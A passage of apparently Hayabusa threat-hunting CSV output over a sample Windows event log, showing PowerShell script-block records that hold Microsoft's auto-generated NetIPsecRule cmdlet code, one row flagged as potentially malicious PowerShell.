[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and 